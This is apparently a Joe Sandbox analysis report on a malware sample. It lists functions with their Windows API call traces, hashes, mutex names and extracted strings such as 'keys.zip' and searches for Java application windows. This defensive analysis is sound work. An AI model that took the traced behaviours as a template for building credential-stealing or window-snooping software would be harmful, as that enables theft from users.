                                                                                                                                                                                                              • Opcode Fuzzy Hash: 943d24fac2712608406510ab67ee9c13492aa610d0cf45bbe7528117e4469740
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD01D4309C9B11BBE31167949D59F1E779C5B48A14F810706FD53A22C0DFA0A850CA7B
                                                                                                                                                                                                              Function 0266A280 Relevance: 18.9, APIs: 15, Instructions: 136COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2190258309-0
                                                                                                                                                                                                              • Opcode ID: 1fb362d0170692c5f1bd3dcf8006a4e5de5ad13149bf1724ba294fbd5e07bda0
                                                                                                                                                                                                              • Instruction ID: 2f64cd9a648d92a4a56f252814aea91beea6003425575bd234bfd2fdd6bd1176
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fb362d0170692c5f1bd3dcf8006a4e5de5ad13149bf1724ba294fbd5e07bda0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 054187B1D41611CBC721EFA8ED8496EB7A8BF44B04F2A1979E44997704DB31A8A0CFD1
                                                                                                                                                                                                              Function 02651BD0 Relevance: 17.9, APIs: 14, Instructions: 355COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 5781576c2525ea4ef8763dd4db4436aa4bac77663a1792fbb93dabd2a0cff693
                                                                                                                                                                                                              • Instruction ID: c02b283003139c65eb96ccf7a54bc6bd7f298ad88b3bb74cf4952fad0c75c9b5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5781576c2525ea4ef8763dd4db4436aa4bac77663a1792fbb93dabd2a0cff693
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FC1A631A00626DFCB15CF68C8A4BAE77B5EF46354F1443D8EC5A9B344DB71AA05CB90
                                                                                                                                                                                                              Function 02665BB0 Relevance: 17.6, APIs: 14, Instructions: 147COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                              • Opcode ID: 717414af5e87da9ddb0cd34543600e03c81f059ca85a91a545b899a9ed7cf492
                                                                                                                                                                                                              • Instruction ID: d07150e9e064d51399d783db92aed677ce2879c1256f731e72657ee6751639fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 717414af5e87da9ddb0cd34543600e03c81f059ca85a91a545b899a9ed7cf492
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA512EB1D412159ADB10DFA5C884AEA7BB9AF09341F04817EED0CAF285EBB45245CFE1
                                                                                                                                                                                                              Function 02663B40 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 138COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D098), ref: 02663B70
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02663BB1
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02663BBB
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02663BC3
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02663BD4
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02663BDB
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02663BE8
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D098,?,02663D9C), ref: 02663C57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: keys.zip$path1.txt
                                                                                                                                                                                                              • API String ID: 1373881290-1274251082
                                                                                                                                                                                                              • Opcode ID: 920e2ada0cf2708bbe9d46b3c2c57bfed97fb8df7c879c6b9c11508b89260640
                                                                                                                                                                                                              • Instruction ID: c577f6905474a0c5b2d835c750d74f0fc4246df9d0ad886fb691baf9113be715
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 920e2ada0cf2708bbe9d46b3c2c57bfed97fb8df7c879c6b9c11508b89260640
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F64127706042469BCB259F389CA87FA7BE5FF55700F1445D8E986D7300EB71D998C790
                                                                                                                                                                                                              Function 026650F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02665124
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02665133
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0266513A
                                                                                                                                                                                                              • memset.MSVCRT ref: 02665152
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02665169
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0266516F
                                                                                                                                                                                                                • Part of subcall function 026541E0: GetProcessHeap.KERNEL32(00000008,02665097,00000000,76DC34D0,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 026541FE
                                                                                                                                                                                                                • Part of subcall function 026541E0: HeapAlloc.KERNEL32(00000000,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 02654205
                                                                                                                                                                                                                • Part of subcall function 026541E0: memset.MSVCRT ref: 02654215
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02665190
                                                                                                                                                                                                              • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026651B7
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026651CB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 02665100
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$memset$AllocComputerNameProcess$ErrorLastlstrcpyn
                                                                                                                                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
                                                                                                                                                                                                              • API String ID: 734199406-1705633369
                                                                                                                                                                                                              • Opcode ID: d2033fa7da41cbec01f801ef8876589306ea72f5d0ebc908d0a3bf0c99e76eb3
                                                                                                                                                                                                              • Instruction ID: 1bbabc147e88bfd30f1a1a59bdaabfcb6891a1ceabc5d71a5f8757d892c1b485
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2033fa7da41cbec01f801ef8876589306ea72f5d0ebc908d0a3bf0c99e76eb3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF213871940219B7D7119664CC49BBFF7B99F88700F600658F947A7280EBB099418BA0
                                                                                                                                                                                                              Function 02665390 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 026474A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,76F8F380,00000000,00000000,?,?,02654E91,?,00000000), ref: 026474C6
                                                                                                                                                                                                                • Part of subcall function 026474A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02654E91,?,00000000,?,?,00000000), ref: 026474E4
                                                                                                                                                                                                                • Part of subcall function 026474A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02654E91,?,00000000,?,?,00000000), ref: 0264750D
                                                                                                                                                                                                                • Part of subcall function 026474A0: RtlAllocateHeap.NTDLL(00000000,?,?,02654E91,?,00000000,?,?,00000000), ref: 02647514
                                                                                                                                                                                                                • Part of subcall function 026474A0: memset.MSVCRT ref: 02647527
                                                                                                                                                                                                                • Part of subcall function 026474A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02647553
                                                                                                                                                                                                                • Part of subcall function 026474A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02647563
                                                                                                                                                                                                                • Part of subcall function 026474A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02647572
                                                                                                                                                                                                                • Part of subcall function 026474A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02647585
                                                                                                                                                                                                                • Part of subcall function 026474A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02647594
                                                                                                                                                                                                                • Part of subcall function 026474A0: HeapValidate.KERNEL32(00000000), ref: 0264759B
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 026653BE
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 026653D2
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,026556AF), ref: 026653E3
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 026653F3
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,026556AF), ref: 02665430
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,026556AF), ref: 02665433
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,026556AF), ref: 02665440
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,026556AF), ref: 02665443
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$Validate$AddressAllocateCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1866686876-3277137149
                                                                                                                                                                                                              • Opcode ID: 6bfd5cf945412f9c08872f37c837e839a788082183c3f9a9d4fa9ca1e20fc5bf
                                                                                                                                                                                                              • Instruction ID: a34ef20a193ff661689dd74bc66c4a0226af0637c5c11353e331fe44eb0a200d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bfd5cf945412f9c08872f37c837e839a788082183c3f9a9d4fa9ca1e20fc5bf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D110831A812007BD710ABB59C4DFAF7BACFF45725F818A14F807E2240DB72D500C6A2
                                                                                                                                                                                                              Function 026643F0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 56sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 0266440C
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02664422
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02664430
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02664439
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02664451
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02664463
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C), ref: 0266446E
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,0269D19C,VEFK), ref: 02664488
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$VEFK
                                                                                                                                                                                                              • API String ID: 849374196-3911370694
                                                                                                                                                                                                              • Opcode ID: 8a354b2a5a418de59f23d81488e81846dca1db630a9cb0a58c86332b981fed48
                                                                                                                                                                                                              • Instruction ID: 4d8a8e1dee034da91eb17fb99ad4c81e564dbee9f77783e821082287bcc47870
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a354b2a5a418de59f23d81488e81846dca1db630a9cb0a58c86332b981fed48
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7016832AC53107BF33167A59C4BF2EB38CDF44B10F424715FE05A62809FE4A8004ABA
                                                                                                                                                                                                              Function 02660110 Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0268A450), ref: 02660121
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0268A488), ref: 02660131
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0268A4B8), ref: 02660141
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0268A4D8), ref: 02660151
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0268A450), ref: 02660161
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0268A488), ref: 02660171
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0268A4B8), ref: 02660181
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0268A4D8), ref: 02660191
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindWindow
                                                                                                                                                                                                              • String ID: SunAwtDialog$SunAwtFrame
                                                                                                                                                                                                              • API String ID: 134000473-1757792087
                                                                                                                                                                                                              • Opcode ID: 329ec0ef929732303a05a268432342f7f7341597cc9e4266bc9df5d7f8e8bfd9
                                                                                                                                                                                                              • Instruction ID: eb20bc83f9ab872d6d7e1fdc4e8363664e7cffb2dd483c68314080d5769a5d3c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 329ec0ef929732303a05a268432342f7f7341597cc9e4266bc9df5d7f8e8bfd9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60F007957C236AACFE1071E96D1EF797B945B90D8DB414323BC46B5105E6849C4205F2
                                                                                                                                                                                                              Function 026632B0 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 026632DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 026632E5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 026632F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0266330B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277), ref: 02663316
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8A99A277,RFK), ref: 02663330
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02663336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 8A99A277$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              • API String ID: 4280258085-1512082180
                                                                                                                                                                                                              • Opcode ID: 85d8cef2e71694cef9730caf4d8ee067a04b240715685ae9403f64638168ae16
                                                                                                                                                                                                              • Instruction ID: 6dd724582e6eb57944e46c6ed67e84346552741767d40331bc65d434eca8c683
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85d8cef2e71694cef9730caf4d8ee067a04b240715685ae9403f64638168ae16
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09F0F470AC53407AF31067908C8EF6E7B9C6F48F00F854644FA03A2280DFA068618AB7
                                                                                                                                                                                                              Function 0265B8F0 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 0265B91C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0265B925
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265B939
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265B94B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a6dd), ref: 0265B956
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8a99a6dd,ALPHA), ref: 0265B970
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0265B976
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 8a99a6dd$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
                                                                                                                                                                                                              • API String ID: 4280258085-1784723349
                                                                                                                                                                                                              • Opcode ID: e57aacfa9686c1587912ceb3947da9df115ca0e59e2b8a8a7708c9eec5ce60ce
                                                                                                                                                                                                              • Instruction ID: 5515815c1820f2643ed8332b8a0950c6abb2d520160d6ffb59449bb1b61904c2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e57aacfa9686c1587912ceb3947da9df115ca0e59e2b8a8a7708c9eec5ce60ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18F028306C93257BE70067608C5AF1E77ACAF0AB08F450604FA03A13C4EFE0A5118ABB
                                                                                                                                                                                                              Function 0265CB98 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 34sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 0265CBAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0265CBB9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265CBCD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265CBDF
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0265CBEE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A689), ref: 0265CBF5
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8A99A689,BSS), ref: 0265CC0F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0265CC15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                              • String ID: 8A99A689$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                              • API String ID: 3206501308-1856957256
                                                                                                                                                                                                              • Opcode ID: a7eb3e224586fc800020bc0172a1fdb2db34305af040383b4c5c02b2f15989a0
                                                                                                                                                                                                              • Instruction ID: 834f0c1541aef5b48793d6443868fc0819e62dc1191a8a914792f12bb664cffa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7eb3e224586fc800020bc0172a1fdb2db34305af040383b4c5c02b2f15989a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACF0F630AC9711BBE3216BA09D49F1E7B986F09F04F400B06FD12A1280DFB084548A67
                                                                                                                                                                                                              Function 02650050 Relevance: 16.6, APIs: 11, Instructions: 96memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02650071
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 0265008C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265008F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0265009C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265009F
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 026500BC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 026500D9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026500E0
                                                                                                                                                                                                              • memset.MSVCRT ref: 026500F0
                                                                                                                                                                                                              • memset.MSVCRT ref: 02650109
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,00000000,00000002), ref: 0265011C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3911349929-0
                                                                                                                                                                                                              • Opcode ID: 8811c749cfe208044e184de94cb1442e4f5eda1082fdfe2679dc27bd33c7b7e0
                                                                                                                                                                                                              • Instruction ID: 455ebd744cc460e5e3eb3c39cd6f1a4d9845aa8868030122d0ba39e0db8676e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8811c749cfe208044e184de94cb1442e4f5eda1082fdfe2679dc27bd33c7b7e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D31D171A40215ABE720DB68DC88F5A77ACEF48710F058244FD099B381DB74E911CBF5
                                                                                                                                                                                                              Function 0264F3C0 Relevance: 16.5, APIs: 13, Instructions: 218memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,-04D1F5C8,00000000,00000000,?,?,?,?), ref: 0264F404
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0264F40B
